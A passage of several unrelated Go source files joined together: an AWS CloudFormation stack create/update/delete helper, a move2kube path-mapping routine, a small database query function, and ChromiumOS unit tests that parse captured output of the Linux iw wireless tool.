		Parameters:    s.Parameters,
		ChangeSetName: s.getChangeSetName(),
		Type:          changeSetType,
		RoleArn:       s.RoleArn,
	}
	changes, err := s.Deployer.GetStackChanges(&getStackChangesOpts)
	if err != nil {
		return err
	}
	// Retain the computed changes for later inspection/reporting.
	s.Changes = changes
	return nil
}
// Delete removes the stack if it exists; when it does not, a warning is
// printed and nil is returned (deleting a missing stack is not an error).
func (s *Stack) Delete() error {
	stackExists, err := s.Deployer.StackExists(s.StackName)
	if err != nil {
		return err
	}
	if stackExists {
		return s.delete()
	}
	color.New(color.FgYellow).Fprintf(os.Stdout, "	Stack %s does not exist in region %s\n", s.StackName, s.Region)
	return nil
}
// create provisions a brand-new stack from the uploaded template, applying
// the marshaled stack policy and optional role.
func (s *Stack) create() error {
	if !s.SuppressMessages {
		fmt.Printf("	Stack doesn't exist, creating a new one\n")
	}
	stackPolicy, err := json.Marshal(s.StackPolicy)
	if err != nil {
		return err
	}
	err = s.Deployer.CreateNewStack(&cloudformation.CreateStackOpts{
		StackName:   s.StackName,
		TemplateUrl: s.TemplateUrl,
		Parameters:  s.Parameters,
		StackPolicy: string(stackPolicy),
		Serverless:  s.serverless,
		RoleArn:     s.RoleArn,
	})
	if err != nil {
		return err
	}
	if !s.SuppressMessages {
		color.New(color.FgGreen).Fprintf(os.Stdout, "	Stack create complete\n")
	}
	return nil
}
// update creates a change set for the existing stack and applies it. The
// stack policy is refreshed first when it changed (so the stack update runs
// under the new policy), and the stack update itself is skipped when the
// change set contains no resource changes and no update is forced.
func (s *Stack) update() error {
	if !s.SuppressMessages {
		fmt.Printf("	Stack exists, will check for updates\n")
	}
	stackPolicy, err := json.Marshal(s.StackPolicy)
	if err != nil {
		return err
	}
	changes, err := s.Deployer.GetStackChanges(&cloudformation.GetStackChangesOpts{
		StackName:     s.StackName,
		TemplateUrl:   s.TemplateUrl,
		StackPolicy:   string(stackPolicy),
		Parameters:    s.Parameters,
		ChangeSetName: s.getChangeSetName(),
		Type:          "UPDATE",
		RoleArn:       s.RoleArn,
	})
	if err != nil {
		if aerr, ok := err.(awserr.Error); ok {
			switch aerr.Code() {
			case "ValidationError":
				// A stack operation already in progress is not fatal; report and skip.
				if strings.Contains(aerr.Message(), "IN_PROGRESS") {
					color.New(color.FgYellow).Fprintf(os.Stdout, "	%s\n", aerr.Message())
					return nil
				}
				return fmt.Errorf("Unhandled AWS ValidationError for stack %s\n%s", s.StackName, aerr.Message())
			default:
				return fmt.Errorf("Unhandled AWS error for stack %s\n%s", s.StackName, aerr.Message())
			}
		}
		return err
	}
	// An empty ("{}") policy is never pushed.
	if changes.StackPolicyChange && string(stackPolicy) != "{}" {
		if !s.SuppressMessages {
			fmt.Printf("	Changes in %s stack policy detected, it will be updated first\n", s.StackName)
		}
		if err := s.Deployer.SetStackPolicy(s.StackName, string(stackPolicy)); err != nil {
			return err
		}
		if !s.SuppressMessages {
			// Typo fix: message previously read "Stack upolicy updated".
			color.New(color.FgGreen).Fprintf(os.Stdout, "	Stack policy updated\n")
		}
	}
	if len(changes.Resources) == 0 && !changes.ForceStackUpdate {
		if !s.SuppressMessages {
			color.New(color.FgYellow).Fprintf(os.Stdout, "	No resource changes detected for stack, skipping update..\n")
		}
		return nil
	}
	if !s.SuppressMessages {
		fmt.Printf("	Changes in %s resources detected, waiting for update to finish\n", s.StackName)
	}
	if err := s.Deployer.UpdateExistingStack(&cloudformation.CreateStackOpts{
		StackName:   s.StackName,
		TemplateUrl: s.TemplateUrl,
		Parameters:  s.Parameters,
		StackPolicy: string(stackPolicy),
		Serverless:  s.serverless,
		RoleArn:     s.RoleArn,
	}); err != nil {
		return err
	}
	if !s.SuppressMessages {
		color.New(color.FgGreen).Fprintf(os.Stdout, "	Stack update complete\n")
	}
	return nil
}
// delete removes the stack unconditionally (callers check existence first).
func (s *Stack) delete() error {
	err := s.Deployer.DeleteStack(&cloudformation.DeleteStackOpts{
		StackName: s.StackName,
		RoleArn:   s.RoleArn,
	})
	if err != nil {
		return err
	}
	color.New(color.FgGreen).Fprintf(os.Stdout, "	Stack delete complete\n")
	return nil
}
// uploadTemplate resolves the template's absolute path and S3 URL, packages
// serverless (SAM) templates, and uploads the template to the stack's bucket
// under the key UID/TemplatePath.
func (s *Stack) uploadTemplate() error {
	s.AbsTemplatePath = s.TemplatePath
	// NOTE(review): for an absolute TemplatePath this URL is built without a
	// "/" between UID and the path, while the upload key below is always
	// UID + "/" + TemplatePath — for absolute paths these look inconsistent
	// (URL ".../UID/abs/path" vs key "UID//abs/path"); confirm with callers.
	s.TemplateUrl = "https://s3-" + s.Region + ".amazonaws.com/" + s.Bucket + "/" + s.UID + s.TemplatePath
	if !filepath.IsAbs(s.TemplatePath) {
		s.AbsTemplatePath = filepath.Join(s.TemplateRootPath, s.TemplatePath)
		s.TemplateUrl = "https://s3-" + s.Region + ".amazonaws.com/" + s.Bucket + "/" + s.UID + "/" + s.TemplatePath
	}
	// us-east-1 uses the "s3." host form rather than the regional "s3-" form.
	if s.Region == "us-east-1" {
		s.TemplateUrl = strings.Replace(s.TemplateUrl, "https://s3-", "https://s3.", -1)
	}
	isServerLessStack, err := templates.IsServerlessTemplate(s.AbsTemplatePath)
	if err != nil {
		return err
	}
	if isServerLessStack {
		s.serverless = true
		fmt.Printf("	Packing serverless stack %s\n", s.StackName)
		err = s.packageServerlessTemplate()
		if err != nil {
			return err
		}
	}
	uploaderOpts := s3.Opts{
		Bucket:   s.Bucket,
		Filepath: s.AbsTemplatePath,
		Key:      s.UID + "/" + s.TemplatePath,
	}
	err = s.Uploader.UploadToS3(&uploaderOpts)
	if err != nil {
		glog.Errorf("template upload for stack %s failed", s.StackName)
		return err
	}
	//if isServerLessStack {
	//	err = os.Remove(s.AbsTemplatePath)
	//	if err != nil {
	//		return err
	//	}
	//}
	return nil
}
|
/*
* Copyright IBM Corporation 2021
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package transformer
import (
"path/filepath"
"strings"
"github.com/konveyor/move2kube/filesystem"
transformertypes "github.com/konveyor/move2kube/types/transformer"
"github.com/sirupsen/logrus"
)
// pair is an ordered (A, B) string tuple, used as a map key to deduplicate
// (source, destination) path combinations.
type pair struct {
	A string
	B string
}
// getpair builds a pair from the two given strings, in order.
func getpair(a, b string) pair {
	var p pair
	p.A = a
	p.B = b
	return p
}
// processPathMappings applies the given path mappings, copying from under
// sourcePath (or an absolute source path) into outputPath. Source mappings
// are processed first so the later mapping types can overlay them; duplicate
// (src, dest) pairs are copied only once. Copy failures are logged and do not
// abort the remaining mappings.
func processPathMappings(pms []transformertypes.PathMapping, sourcePath, outputPath string) error {
	copiedSourceDests := map[pair]bool{}
	for _, pm := range pms {
		if !strings.EqualFold(pm.Type, transformertypes.SourcePathMappingType) || copiedSourceDests[getpair(pm.SrcPath, pm.DestPath)] {
			continue
		}
		srcPath := pm.SrcPath
		if !filepath.IsAbs(pm.SrcPath) {
			srcPath = filepath.Join(sourcePath, pm.SrcPath)
		}
		destPath := filepath.Join(outputPath, pm.DestPath)
		if err := filesystem.Merge(srcPath, destPath, true); err != nil {
			logrus.Errorf("Error while copying sourcepath for %+v . Error: %q", pm, err)
		}
		copiedSourceDests[getpair(pm.SrcPath, pm.DestPath)] = true
	}
	copiedDefaultDests := map[pair]bool{}
	for _, pm := range pms {
		destPath := filepath.Join(outputPath, pm.DestPath)
		switch strings.ToLower(pm.Type) {
		case strings.ToLower(transformertypes.SourcePathMappingType): // skip sources, handled above
		case strings.ToLower(transformertypes.ModifiedSourcePathMappingType):
			if err := filesystem.Merge(pm.SrcPath, destPath, false); err != nil {
				// Consistency fix: include the error like the source-mapping branch does.
				logrus.Errorf("Error while copying sourcepath for %+v . Error: %q", pm, err)
			}
		case strings.ToLower(transformertypes.TemplatePathMappingType):
			if err := filesystem.TemplateCopy(pm.SrcPath, destPath, pm.TemplateConfig); err != nil {
				logrus.Errorf("Error while copying sourcepath for %+v . Error: %q", pm, err)
			}
		default:
			if !copiedDefaultDests[getpair(pm.SrcPath, pm.DestPath)] {
				if err := filesystem.Merge(pm.SrcPath, destPath, true); err != nil {
					logrus.Errorf("Error while copying sourcepath for %+v . Error: %q", pm, err)
				}
				copiedDefaultDests[getpair(pm.SrcPath, pm.DestPath)] = true
			}
		}
	}
	return nil
}
|
package DbService
import (
"fmt"
"ledger/DbDao"
)
//type workList struct {
// WorkId string
// WorkName string
// PutTime string
//}
// QueryWorkList returns the works (WorkID, workname, time) owned by the given
// username, as a slice of column-name -> value maps. The rows are also echoed
// to stdout (pre-existing debug behavior, kept as-is).
func QueryWorkList(username string) []map[string]string {
	queryResult, err := DbDao.QueryForMapSlice("SELECT WorkID,workname,time FROM tb_Work , tb_User where tb_Work.owner = tb_User.userID and tb_User.username = ?", username)
	if err != nil {
		// Bug fix: the query error was silently discarded, making failures
		// indistinguishable from an empty result set. Surface it.
		fmt.Println("QueryWorkList: query failed:", err)
	}
	for k := range queryResult {
		fmt.Println(queryResult[k]["WorkID"])
		fmt.Println(queryResult[k]["workname"])
		fmt.Println(queryResult[k]["time"])
	}
	return queryResult
}
|
// Copyright 2019 The ChromiumOS Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
// Package iw contains utility functions to wrap around the iw program.
package iw
import (
"context"
"io"
"os"
"reflect"
"testing"
"github.com/google/go-cmp/cmp"
)
// stubCmdRunner is a simple stub of CmdRunner which always returns the given content
// as command output. This is useful for testing some simple parsing that is not
// extracted as an independent function.
type stubCmdRunner struct {
	// out is returned verbatim by Output for every command.
	out []byte
}
// Run is a noop mock which always returns nil, regardless of cmd and args.
func (r *stubCmdRunner) Run(ctx context.Context, cmd string, args ...string) error {
	return nil
}
// Output is a mock which pretends the command is executed successfully and prints
// the pre-assigned output (r.out), ignoring cmd and args.
func (r *stubCmdRunner) Output(ctx context.Context, cmd string, args ...string) ([]byte, error) {
	return r.out, nil
}
// CreateCmd is a mock function which does nothing.
func (r *stubCmdRunner) CreateCmd(ctx context.Context, cmd string, args ...string) {
	// Intentionally empty; the redundant bare return was removed (staticcheck S1023).
}
// SetStdOut is a mock function which does nothing.
func (r *stubCmdRunner) SetStdOut(stdoutFile *os.File) {
	// Intentionally empty; the redundant bare return was removed (staticcheck S1023).
}
// StderrPipe is a mock function which always returns a nil pipe and nil error.
func (r *stubCmdRunner) StderrPipe() (io.ReadCloser, error) {
	return nil, nil
}
// StartCmd is a mock function which always returns nil.
func (r *stubCmdRunner) StartCmd() error {
	return nil
}
// WaitCmd is a mock function which always returns nil.
func (r *stubCmdRunner) WaitCmd() error {
	return nil
}
// CmdExists is a mock function which always returns false.
func (r *stubCmdRunner) CmdExists() bool {
	return false
}
// ReleaseProcess is a mock function which always returns nil.
func (r *stubCmdRunner) ReleaseProcess() error {
	return nil
}
// ResetCmd is a mock function which does nothing.
func (r *stubCmdRunner) ResetCmd() {
	// Intentionally empty; the redundant bare return was removed (staticcheck S1023).
}
// TestAllLinkKeys checks that allLinkKeys parses every "key: value" line of
// `iw link` output into a map, skipping the connection header line.
func TestAllLinkKeys(t *testing.T) {
	const testStr = `Connected to 74:e5:43:10:4f:c0 (on wlan0)
SSID: PMKSACaching_4m9p5_ch1
freq: 5220
RX: 5370 bytes (37 packets)
TX: 3604 bytes (15 packets)
signal: -59 dBm
tx bitrate: 13.0 MBit/s MCS 1
bss flags: short-slot-time
dtim period: 5
beacon int: 100`
	cmpMap := map[string]string{
		"SSID":        "PMKSACaching_4m9p5_ch1",
		"freq":        "5220",
		"TX":          "3604 bytes (15 packets)",
		"signal":      "-59 dBm",
		"bss flags":   "short-slot-time",
		"dtim period": "5",
		"beacon int":  "100",
		"RX":          "5370 bytes (37 packets)",
		"tx bitrate":  "13.0 MBit/s MCS 1",
	}
	l := allLinkKeys(testStr)
	if !reflect.DeepEqual(l, cmpMap) {
		t.Errorf("unexpected result in allLinkKeys: got %v, want %v", l, cmpMap)
	}
}
// TestParseScanResults checks that parseScanResults extracts BSS, frequency,
// SSID, security type, HT mode, and signal from `iw scan` output.
func TestParseScanResults(t *testing.T) {
	const testStr = `BSS 00:11:22:33:44:55(on wlan0)
freq: 2447
beacon interval: 100 TUs
signal: -46.00 dBm
Information elements from Probe Response frame:
SSID: my_wpa2_network
Extended supported rates: 24.0 36.0 48.0 54.0
HT capabilities:
Capabilities: 0x0c
HT20
HT operation:
* primary channel: 8
* secondary channel offset: no secondary
* STA channel width: 20 MHz
RSN: * Version: 1
* Group cipher: CCMP
* Pairwise ciphers: CCMP
* Authentication suites: PSK
* Capabilities: 1-PTKSA-RC 1-GTKSA-RC (0x0000)
`
	l, err := parseScanResults(testStr)
	if err != nil {
		t.Fatal("parseScanResults failed: ", err)
	}
	cmpBSS := []*BSSData{
		{
			BSS:       "00:11:22:33:44:55",
			Frequency: 2447,
			SSID:      "my_wpa2_network",
			Security:  "RSN",
			HT:        "HT20",
			Signal:    -46,
		},
	}
	if !reflect.DeepEqual(l, cmpBSS) {
		t.Errorf("unexpected result in parseScanResults: got %v, want %v", l, cmpBSS)
	}
}
// TestNewPhy exercises newPhy on captured `iw phy` output: one numeric-named
// phy with interface combinations, and one VHT/MU-MIMO-capable named phy.
func TestNewPhy(t *testing.T) {
	testcases := []struct {
		header  string
		section string
		expect  *Phy
	}{
		{
			header: `Wiphy 3`,
			section: ` max # scan SSIDs: 20
max scan IEs length: 425 bytes
max # sched scan SSIDs: 20
max # match sets: 11
Retry short limit: 7
Retry long limit: 4
Coverage class: 0 (up to 0m)
Device supports RSN-IBSS.
Device supports AP-side u-APSD.
Device supports T-DLS.
Supported Ciphers:
* WEP40 (00-0f-ac:1)
* WEP104 (00-0f-ac:5)
* TKIP (00-0f-ac:2)
* CCMP-128 (00-0f-ac:4)
* CMAC (00-0f-ac:6)
Available Antennas: TX 0 RX 0
Supported interface modes:
* IBSS
* managed
* monitor
Band 1:
Capabilities: 0x11ef
RX LDPC
HT20/HT40
SM Power Save disabled
RX HT20 SGI
RX HT40 SGI
TX STBC
RX STBC 1-stream
Max AMSDU length: 3839 bytes
DSSS/CCK HT40
Maximum RX AMPDU length 65535 bytes (exponent: 0x003)
Minimum RX AMPDU time spacing: 4 usec (0x05)
HT Max RX data rate: 300 Mbps
HT TX/RX MCS rate indexes supported: 0-15
Bitrates (non-HT):
* 1.0 Mbps
Frequencies:
* 2412 MHz [1] (22.0 dBm)
Supported commands:
* connect
* disconnect
valid interface combinations:
* #{ managed } <= 2, #{ AP, P2P-client, P2P-GO } <= 2, #{ P2P-device } <= 1,
total <= 4, #channels <= 1
* #{ managed } <= 2, #{ P2P-client } <= 2, #{ AP, P2P-GO } <= 1, #{ P2P-device } <= 1,
total <= 4, #channels <= 2
* #{ managed } <= 1, #{ outside context of a BSS, mesh point, IBSS } <= 1,
total <= 2, #channels <= 1`,
			expect: &Phy{
				Name: "3",
				Bands: []Band{
					{
						Num: 1,
						FrequencyFlags: map[int][]string{
							2412: nil,
						},
						MCSIndices: []int{
							0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15,
						},
					},
				},
				Modes: []string{
					"IBSS",
					"managed",
					"monitor",
				},
				Commands: []string{
					"connect",
					"disconnect",
				},
				Features: []string{
					"RSN-IBSS",
					"AP-side u-APSD",
					"T-DLS",
				},
				RxAntenna:       0,
				TxAntenna:       0,
				MaxScanSSIDs:    20,
				SupportVHT:      false,
				SupportHT2040:   true,
				SupportHT20SGI:  true,
				SupportHT40SGI:  true,
				SupportVHT80SGI: false,
				SupportMUMIMO:   false,
				// One parsed IfaceCombination per "valid interface combinations" entry.
				IfaceCombinations: []IfaceCombination{
					{
						IfaceLimits: []IfaceLimit{
							{
								IfaceTypes: []IfType{
									IfTypeManaged,
								},
								MaxCount: 2,
							},
							{
								IfaceTypes: []IfType{
									IfTypeAP,
									IfTypeP2PClient,
									IfTypeP2PGO,
								},
								MaxCount: 2,
							},
							{
								IfaceTypes: []IfType{
									IfTypeP2PDevice,
								},
								MaxCount: 1,
							},
						},
						MaxTotal:    4,
						MaxChannels: 1,
					},
					{
						IfaceLimits: []IfaceLimit{
							{
								IfaceTypes: []IfType{
									IfTypeManaged,
								},
								MaxCount: 2,
							},
							{
								IfaceTypes: []IfType{
									IfTypeP2PClient,
								},
								MaxCount: 2,
							},
							{
								IfaceTypes: []IfType{
									IfTypeAP,
									IfTypeP2PGO,
								},
								MaxCount: 1,
							},
							{
								IfaceTypes: []IfType{
									IfTypeP2PDevice,
								},
								MaxCount: 1,
							},
						},
						MaxTotal:    4,
						MaxChannels: 2,
					},
					{
						IfaceLimits: []IfaceLimit{
							{
								IfaceTypes: []IfType{
									IfTypeManaged,
								},
								MaxCount: 1,
							},
							{
								IfaceTypes: []IfType{
									IfTypeOutsideContextOfBSS,
									IfTypeMeshPoint,
									IfTypeIBSS,
								},
								MaxCount: 1,
							},
						},
						MaxTotal:    2,
						MaxChannels: 1,
					},
				},
			},
		},
		{
			header: `Wiphy phy0`,
			section: ` wiphy index: 0
max # scan SSIDs: 16
max scan IEs length: 195 bytes
max # sched scan SSIDs: 0
max # match sets: 0
max # scan plans: 1
max scan plan interval: -1
max scan plan iterations: 0
Retry short limit: 7
Retry long limit: 4
Coverage class: 0 (up to 0m)
Device supports RSN-IBSS.
Device supports AP-side u-APSD.
Supported Ciphers:
* WEP40 (00-0f-ac:1)
* WEP104 (00-0f-ac:5)
* TKIP (00-0f-ac:2)
* CCMP-128 (00-0f-ac:4)
* CMAC (00-0f-ac:6)
* CMAC-256 (00-0f-ac:13)
* GMAC-128 (00-0f-ac:11)
* GMAC-256 (00-0f-ac:12)
Available Antennas: TX 0x3 RX 0x3
Configured Antennas: TX 0x3 RX 0x3
Supported interface modes:
* managed
* AP
* monitor
Band 2:
Capabilities: 0x19ef
RX LDPC
HT20/HT40
SM Power Save disabled
RX HT20 SGI
RX HT40 SGI
TX STBC
RX STBC 1-stream
Max AMSDU length: 7935 bytes
DSSS/CCK HT40
Maximum RX AMPDU length 65535 bytes (exponent: 0x003)
Minimum RX AMPDU time spacing: 8 usec (0x06)
HT TX/RX MCS rate indexes supported: 0-15
VHT Capabilities (0x339071b2):
Max MPDU length: 11454
Supported Channel Width: neither 160 nor 80+80
RX LDPC
short GI (80 MHz)
TX STBC
SU Beamformee
MU Beamformee
RX antenna pattern consistency
TX antenna pattern consistency
VHT RX MCS set:
1 streams: MCS 0-9
2 streams: MCS 0-9
3 streams: not supported
4 streams: not supported
5 streams: not supported
6 streams: not supported
7 streams: not supported
8 streams: not supported
VHT RX highest supported: 0 Mbps
VHT TX MCS set:
1 streams: MCS 0-9
2 streams: MCS 0-9
3 streams: not supported
4 streams: not supported
5 streams: not supported
6 streams: not supported
7 streams: not supported
8 streams: not supported
VHT TX highest supported: 0 Mbps
Bitrates (non-HT):
* 6.0 Mbps
* 9.0 Mbps
* 12.0 Mbps
* 18.0 Mbps
* 24.0 Mbps
* 36.0 Mbps
* 48.0 Mbps
* 54.0 Mbps
Frequencies:
* 5180 MHz [36] (23.0 dBm)
Supported commands:
* new_interface
* set_interface
`,
			expect: &Phy{
				Name: "phy0",
				Bands: []Band{
					{
						Num: 2,
						FrequencyFlags: map[int][]string{
							5180: nil,
						},
						MCSIndices: []int{
							0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15,
						},
					},
				},
				Modes: []string{
					"managed",
					"AP",
					"monitor",
				},
				Commands: []string{
					"new_interface",
					"set_interface",
				},
				Features: []string{
					"RSN-IBSS",
					"AP-side u-APSD",
				},
				RxAntenna:         3,
				TxAntenna:         3,
				MaxScanSSIDs:      16,
				SupportVHT:        true,
				SupportHT2040:     true,
				SupportHT20SGI:    true,
				SupportHT40SGI:    true,
				SupportVHT80SGI:   true,
				SupportMUMIMO:     true,
				IfaceCombinations: []IfaceCombination(nil),
			},
		},
	}
	for i, tc := range testcases {
		l, err := newPhy(tc.header, tc.section)
		if err != nil {
			t.Errorf("testcase #%d: newPhy failed: %v", i, err)
			continue
		}
		if !reflect.DeepEqual(l, tc.expect) {
			t.Errorf("testcase #%d: unexpected result in newPhy: got %v, want %v", i, l, tc.expect)
		}
	}
}
// TestParseHiddenScanResults checks parsing of a hidden network: the SSID is
// empty and, with no RSN/WPA element present, security is reported as "open".
func TestParseHiddenScanResults(t *testing.T) {
	const testStr = `BSS 00:11:22:33:44:55(on wlan0)
freq: 2412
beacon interval: 100 TUs
signal: -46.00 dBm
Information elements from Probe Response frame:
SSID:
Supported rates: 1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0
Extended supported rates: 24.0 36.0 48.0 54.0
HT capabilities:
Capabilities: 0x0c
HT20
HT operation:
* primary channel: 8
* secondary channel offset: no secondary
* STA channel width: 20 MHz
`
	l, err := parseScanResults(testStr)
	if err != nil {
		t.Fatal("parseScanResults failed: ", err)
	}
	cmpBSS := []*BSSData{
		{
			BSS:       "00:11:22:33:44:55",
			Frequency: 2412,
			SSID:      "",
			Security:  "open",
			HT:        "HT20",
			Signal:    -46,
		},
	}
	if diff := cmp.Diff(l, cmpBSS); diff != "" {
		t.Error("parseScanResults returned unexpected result; diff:\n", diff)
	}
}
// TestParseBandMCSIndices checks that MCS index ranges and single values
// ("0-15, 32") are expanded into the full list of indices.
func TestParseBandMCSIndices(t *testing.T) {
	// Partial data from elm DUT.
	content := `
Maximum RX AMPDU length 65535 bytes (exponent: 0x003)
Minimum RX AMPDU time spacing: No restriction (0x00)
HT TX/RX MCS rate indexes supported: 0-15, 32
`
	expected := []int{0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 32}
	ret, err := parseBandMCSIndices(content)
	if err != nil {
		t.Fatal("parseBandMCSIndices failed: ", err)
	}
	if !reflect.DeepEqual(ret, expected) {
		t.Errorf("unexpected result in parseBandMCSIndices: got %v, want %v", ret, expected)
	}
}
// TestParseFrequencyFlags checks that per-frequency flags are parsed: a
// disabled channel, a flag-free channel (nil), and multiple flags.
func TestParseFrequencyFlags(t *testing.T) {
	// Hand-crafted data to test different cases.
	content := `
Frequencies:
* 5040 MHz [8] (disabled)
* 5190 MHz [38] (23.0 dBm)
* 5210 MHz [42] (23.0 dBm) (passive scan, radar detection)
`
	expected := map[int][]string{
		5040: {"disabled"},
		5190: nil,
		5210: {"passive scan", "radar detection"},
	}
	ret, err := parseFrequencyFlags(content)
	if err != nil {
		t.Fatal("parseFrequencyFlags failed: ", err)
	}
	if !reflect.DeepEqual(ret, expected) {
		t.Errorf("unexpected result in parseFrequencyFlags: got %v, want %v", ret, expected)
	}
}
// TestParseInterfaces checks that `iw dev` output is parsed into NetDev
// entries (phy number, interface name, type), across multiple phys and with
// extra per-interface attribute lines present.
func TestParseInterfaces(t *testing.T) {
	for _, param := range []struct {
		content  string
		expected []*NetDev
	}{
		{
			content: `phy#1
Interface managed0
ifindex 142
wdev 0x100000080
addr 00:11:22:33:44:55
type managed
Interface monitor0
ifindex 141
wdev 0x10000007f
addr 00:11:22:33:44:55
type monitor
phy#0
Interface managed2
ifindex 139
wdev 0x9
addr 00:11:22:33:44:55
type managed
`,
			expected: []*NetDev{
				{
					PhyNum: 1,
					IfName: "managed0",
					IfType: "managed",
				},
				{
					PhyNum: 1,
					IfName: "monitor0",
					IfType: "monitor",
				},
				{
					PhyNum: 0,
					IfName: "managed2",
					IfType: "managed",
				},
			},
		},
		{
			content: `phy#0
Interface wlan0
ifindex 8
wdev 0x100000001
addr 50:00:00:00:00:01
type managed
channel 52 (5260 MHz), width: 40 MHz, center1: 5270 MHz
txpower 23.00 dBm
`,
			expected: []*NetDev{
				{
					PhyNum: 0,
					IfName: "wlan0",
					IfType: "managed",
				},
			},
		},
	} {
		devs, err := parseInterfaces(param.content)
		if err != nil {
			t.Fatal("parseInterfaces failed: ", err)
		}
		if !reflect.DeepEqual(devs, param.expected) {
			t.Errorf("unexpected result in parseInterfaces: got %v, want %v", devs, param.expected)
		}
	}
}
// TestSetFreqOption checks newSetFreqConf argument generation for each
// channel-width option, including default center-frequency derivation and
// rejection of invalid combinations (valid=false cases).
func TestSetFreqOption(t *testing.T) {
	testcases := []struct {
		ctrlFreq int
		ops      []SetFreqOption
		valid    bool
		args     []string
	}{
		{
			ctrlFreq: 2412,
			ops:      nil,
			valid:    true,
			args:     []string{"2412"},
		},
		{
			ctrlFreq: 2412,
			ops:      []SetFreqOption{SetFreqChWidth(ChWidthHT20)},
			valid:    true,
			args:     []string{"2412", "HT20"},
		},
		{
			ctrlFreq: 2412,
			ops:      []SetFreqOption{SetFreqChWidth(ChWidthHT40Plus)},
			valid:    true,
			args:     []string{"2412", "HT40+"},
		},
		{
			ctrlFreq: 5240,
			ops:      []SetFreqOption{SetFreqChWidth(ChWidthHT40Minus)},
			valid:    true,
			args:     []string{"5240", "HT40-"},
		},
		{
			// center freq cannot be given for HT40+.
			ctrlFreq: 5180,
			ops: []SetFreqOption{
				SetFreqChWidth(ChWidthHT40Plus),
				SetFreqCenterFreq1(5190),
			},
			valid: false,
		},
		{
			ctrlFreq: 5240,
			ops:      []SetFreqOption{SetFreqChWidth(ChWidth80)},
			valid:    true,
			args:     []string{"5240", "80", "5210"},
		},
		{
			ctrlFreq: 5240,
			ops: []SetFreqOption{
				SetFreqChWidth(ChWidth80),
				SetFreqCenterFreq1(5210),
			},
			valid: true,
			args:  []string{"5240", "80", "5210"},
		},
		{
			ctrlFreq: 5240,
			ops:      []SetFreqOption{SetFreqChWidth(ChWidth160)},
			valid:    true,
			args:     []string{"5240", "160", "5250"},
		},
		{
			ctrlFreq: 5200,
			ops: []SetFreqOption{
				SetFreqChWidth(ChWidth160),
				SetFreqCenterFreq1(5250),
			},
			valid: true,
			args:  []string{"5200", "160", "5250"},
		},
		{
			// 80+80 requires both center frequencies.
			ctrlFreq: 5240,
			ops:      []SetFreqOption{SetFreqChWidth(ChWidth80P80)},
			valid:    false,
		},
		{
			ctrlFreq: 5200,
			ops: []SetFreqOption{
				SetFreqChWidth(ChWidth80P80),
				SetFreqCenterFreq1(5210),
				SetFreqCenterFreq2(5530),
			},
			valid: true,
			args:  []string{"5200", "80+80", "5210", "5530"},
		},
	}
	for i, tc := range testcases {
		conf, err := newSetFreqConf(tc.ctrlFreq, tc.ops...)
		if !tc.valid {
			if err == nil {
				t.Errorf("testcase #%d should fail but succeed", i)
			}
			continue
		} else if err != nil {
			t.Errorf("testcase #%d failed with err=%s", i, err.Error())
		} else if args := conf.toArgs(); !reflect.DeepEqual(args, tc.args) {
			t.Errorf("testcase #%d failed, got args=%v, expect=%v", i, args, tc.args)
		}
	}
}
// TestExtractBSSID checks that extractBSSID pulls the BSSID out of the
// "Connected to ..." header of `iw link` output.
func TestExtractBSSID(t *testing.T) {
	const testStr = `Connected to 74:e5:43:10:4f:c0 (on wlan0)
SSID: PMKSACaching_4m9p5_ch1
freq: 5220
RX: 5370 bytes (37 packets)
TX: 3604 bytes (15 packets)
signal: -59 dBm
tx bitrate: 13.0 MBit/s MCS 1
bss flags: short-slot-time
dtim period: 5
beacon int: 100`
	expected := "74:e5:43:10:4f:c0"
	bss, err := extractBSSID(testStr)
	if err != nil {
		t.Errorf("unexpected error=%s", err.Error())
	} else if bss != expected {
		t.Errorf("got bss: %s, expect: %s", bss, expected)
	}
}
// TestRegulatoryDomain runs RegulatoryDomain and IsRegulatorySelfManaged
// against captured `iw reg get` output via stubCmdRunner, covering two
// country-set cases (JP, US) and a phy-self-managed case.
func TestRegulatoryDomain(t *testing.T) {
	testcases := []struct {
		out         string
		domain      string
		selfManaged bool
	}{
		// JP.
		{
			out: `global
country JP: DFS-JP
(2402 - 2482 @ 40), (N/A, 20), (N/A)
(2474 - 2494 @ 20), (N/A, 20), (N/A), NO-OFDM
(4910 - 4990 @ 40), (N/A, 23), (N/A)
(5030 - 5090 @ 40), (N/A, 23), (N/A)
(5170 - 5250 @ 80), (N/A, 20), (N/A), AUTO-BW
(5250 - 5330 @ 80), (N/A, 20), (0 ms), DFS, AUTO-BW
(5490 - 5710 @ 160), (N/A, 23), (0 ms), DFS
(59000 - 66000 @ 2160), (N/A, 10), (N/A)
`,
			domain:      "JP",
			selfManaged: false,
		},
		// US.
		{
			out: `global
country US: DFS-FCC
(2402 - 2472 @ 40), (N/A, 30), (N/A)
(5170 - 5250 @ 80), (N/A, 23), (N/A), AUTO-BW
(5250 - 5330 @ 80), (N/A, 23), (0 ms), DFS, AUTO-BW
(5490 - 5730 @ 160), (N/A, 23), (0 ms), DFS
(5735 - 5835 @ 80), (N/A, 30), (N/A)
(57240 - 71000 @ 2160), (N/A, 40), (N/A)
`,
			domain:      "US",
			selfManaged: false,
		},
		// Self managed.
		{
			out: `global
country 00: DFS-UNSET
(2402 - 2472 @ 40), (N/A, 20), (N/A)
(2457 - 2482 @ 20), (N/A, 20), (N/A), AUTO-BW, PASSIVE-SCAN
(2474 - 2494 @ 20), (N/A, 20), (N/A), NO-OFDM, PASSIVE-SCAN
(5170 - 5250 @ 80), (N/A, 20), (N/A), AUTO-BW, PASSIVE-SCAN
(5250 - 5330 @ 80), (N/A, 20), (0 ms), DFS, AUTO-BW, PASSIVE-SCAN
(5490 - 5730 @ 160), (N/A, 20), (0 ms), DFS, PASSIVE-SCAN
(5735 - 5835 @ 80), (N/A, 20), (N/A), PASSIVE-SCAN
(57240 - 63720 @ 2160), (N/A, 0), (N/A)
